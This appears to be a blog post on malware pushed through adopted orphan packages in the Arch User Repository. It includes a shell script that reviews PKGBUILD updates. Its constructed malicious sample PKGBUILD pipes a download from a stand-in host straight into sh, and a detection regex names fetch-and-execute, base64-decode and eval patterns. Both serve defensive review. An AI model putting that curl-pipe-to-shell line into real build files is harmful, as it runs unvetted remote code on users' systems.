The Arch User Repository is not a problem
Anyone can make a package for the Arch User Repository and anyone else can install it. There is no verification (a verified AUR would just be another official repository, which would make it pointless), so you have to trust the person who packages it. You review the PKGBUILD and the other files, make sure the sources come from the upstream you expect, and when the package updates you review the changes. Has the package added new dependencies or sources that make no sense? Don't install it; question it, or consult the mailing list or forums.
If someone wanted to put malware on the AUR they could make a new package and push the malware, but a new package has no user base. Instead, they could take over orphan packages.
An orphan package is a package that has no maintainer, and anyone can adopt it and push updates. This past week a number of accounts adopted many orphaned packages just to add malicious code, but these packages were abandoned, and probably have a very small user base, if any at all. To be infected by the malware you need to have installed the package after the malicious update was pushed. Having the previous build installed does not mean you are infected.
Is the AUR insecure? Do the Arch Linux maintainers need to take the AUR down? Does the AUR need a verification process, or does something else need to change? Even though the AUR is unverified, is malware on it bad? Yes; there are still rules. Is it bad that anyone can adopt an orphan package? Maybe, but who uses these orphan packages? If you do, you should review the changes and let the staff know of the malicious activity.
To install a package from the official Arch Linux repositories, you run a single command and pacman fetches it. Those repositories are maintained by trusted users and the packages are signed. The AUR is unsupported, and there are several steps[^1] that need to be taken to install a package from it.
- Download the tarball (or git clone, which requires git to be installed).
- Extract it and enter the directory.
- Build the package with makepkg.
- Install it with pacman.
This is not an automated process. In theory you could automate it if you have git installed, but that is an elaborate process that can't be done accidentally. The list above is the required set of steps; you can't skip any, and before you run makepkg (step 3) you must also have read the PKGBUILD and any other files in the directory (an .install file, patches) so that you know what will be executed and installed, because makepkg sources the PKGBUILD and runs its functions as your user.
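The steps above, and the "review the changes" part of it, as an added example for this post (not code from the Arch project or the original author). The first function is the manual workflow as you would type it and needs git, makepkg and pacman. The rest is a reviewer helper for updates: it parses two revisions of a PKGBUILD as plain text (never sourcing them, since sourcing is exactly what executes the code under review), reports sources and dependencies that appeared in the new revision, and greps the new revision for download-and-execute patterns. The package name `example-pkg`, the `example.com`/`example.net` hosts and both sample PKGBUILDs are constructed for the demonstration.

```shell
#!/bin/sh
# Manual AUR workflow plus a PKGBUILD update reviewer. Added example, not the
# Arch project's code. "example-pkg", the example.* hosts and the two sample
# PKGBUILDs below are constructed.

# Steps 1-4 as typed, with the review step made explicit. Needs git, makepkg
# and pacman, so it is shown here but not exercised by the demo at the bottom.
aur_fetch_build_install() (
    pkg=$1
    git clone "https://aur.archlinux.org/$pkg.git" && cd "$pkg" || exit 1
    ${PAGER:-less} PKGBUILD          # read it (and any .install file) first
    makepkg                          # sources the PKGBUILD and runs it as you
    sudo pacman -U ./"$pkg"-*.pkg.tar.zst
)

# Print the elements of a top-level bash array assignment (source=(...),
# depends=(...)) from a PKGBUILD, one per line. Pure text parsing: the file is
# never sourced, because sourcing it would execute the code under review.
pkgbuild_array() (
    name=$1; file=$2
    awk -v name="$name" -v q="'" '
        $0 ~ ("^" name "=\\(") { inarr = 1; sub("^" name "=\\(", "") }
        inarr {
            line = $0
            if (line ~ /\)/) { sub(/\).*/, "", line); inarr = 0 }
            n = split(line, parts, /[ \t]+/)
            for (i = 1; i <= n; i++) {
                gsub("[\"" q "]", "", parts[i])      # strip the quotes
                if (parts[i] != "" && parts[i] !~ /^#/) print parts[i]
            }
        }' "$file"
)

# Elements of array $3 present in the new PKGBUILD ($2) but not in the old ($1).
pkgbuild_added() {
    pkgbuild_array "$3" "$2" | while IFS= read -r elem; do
        pkgbuild_array "$3" "$1" | grep -Fxq -- "$elem" || printf '%s\n' "$elem"
    done
}

# Patterns that have no business in a PKGBUILD: fetch-and-execute, decoding of
# embedded payloads, eval of arbitrary strings.
SUSPICIOUS_RE='(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh([[:space:]]|$)|base64[[:space:]]+(-d|--decode)|(^|[[:space:];])eval[[:space:]]'

# Compare two PKGBUILD revisions and print what a reviewer must look at.
# Returns 1 when anything was flagged, 0 when the update added nothing new.
review_pkgbuild_update() {
    old=$1; new=$2; flagged=0
    for name in source depends makedepends optdepends; do
        added=$(pkgbuild_added "$old" "$new" "$name")
        if [ -n "$added" ]; then
            printf 'ADDED %s:\n%s\n' "$name" "$added"
            flagged=1
        fi
    done
    hits=$(grep -nE "$SUSPICIOUS_RE" "$new" || true)
    if [ -n "$hits" ]; then
        printf 'SUSPICIOUS lines in %s:\n%s\n' "$new" "$hits"
        flagged=1
    fi
    return "$flagged"
}

# Two constructed revisions: the second adds a dependency, a source on a
# different host and a curl-pipe-to-sh in build(). Quoted heredocs keep the
# ${pkgver} references literal, as they are in the file.
write_sample_pkgbuilds() {
    cat > "$1/PKGBUILD.old" <<'EOF'
pkgname=example-pkg
pkgver=1.0
pkgrel=1
depends=('glibc')
makedepends=('cmake')
source=("https://github.com/example/example-pkg/archive/v${pkgver}.tar.gz")
sha256sums=('SKIP')
build() {
  cmake -B build -S "$pkgname-$pkgver"
}
EOF
    cat > "$1/PKGBUILD.new" <<'EOF'
pkgname=example-pkg
pkgver=1.1
pkgrel=1
depends=('glibc' 'python')
makedepends=('cmake')
source=("https://github.com/example/example-pkg/archive/v${pkgver}.tar.gz"
        "https://files.example.net/helper.sh")
sha256sums=('SKIP' 'SKIP')
build() {
  cmake -B build -S "$pkgname-$pkgver"
  curl -s https://files.example.net/setup | sh
}
EOF
}

# Demo on the constructed samples: prints the added dependency, the added
# source and the curl|sh line, and returns non-zero so a wrapper can refuse
# to run makepkg until the diff has been understood.
demo_dir=$(mktemp -d)
write_sample_pkgbuilds "$demo_dir"
review_pkgbuild_update "$demo_dir/PKGBUILD.old" "$demo_dir/PKGBUILD.new" \
    || echo "review flagged changes: do not build until you understand them"
rm -rf "$demo_dir"
```

The helper is deliberately a text parser rather than `source PKGBUILD`: the whole point of the review is that nothing in the package has run yet. A flagged update is not automatically malicious (a new upstream mirror or a genuine new dependency will trip it too); it is the list of things you have to read and explain to yourself before building.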
“But AUR helpers…” No. Don't use them. The steps above are the correct way to build and install an AUR package. AUR helpers collapse the whole process into a single command, which makes skipping the review the default, and that is exactly what makes them dangerous. Don't use them.
“But that's annoying.” Then switch to Ubuntu.
“But how do I get updates?” You subscribe to the email notifications for the package. When new commits are pushed, you get an email, and then you review the changes before rebuilding.
“But the noobs!” Arch Linux is not for beginners. That doesn't mean you can't use it as a beginner, but you need to be able to read and follow instructions. The wiki page explains how to use the AUR.
“What about $archBasedDistro?” Don't use them. They often try to incorporate the AUR seamlessly, so that you don't even realise you are not installing packages from the official repos. Very dangerous!
The fact that a lot of orphan packages were taken over by bots to push malware is bad, but how can it be stopped? Currently, if you think the maintainer of a package has abandoned it but still owns it, you can request to take it over, whereas if the package is already orphaned you can take it over immediately. Having to request to take over an orphan package as well would most likely have stopped this issue in the first place.
[^1]: I have written about how to use the AUR in a previous blog post.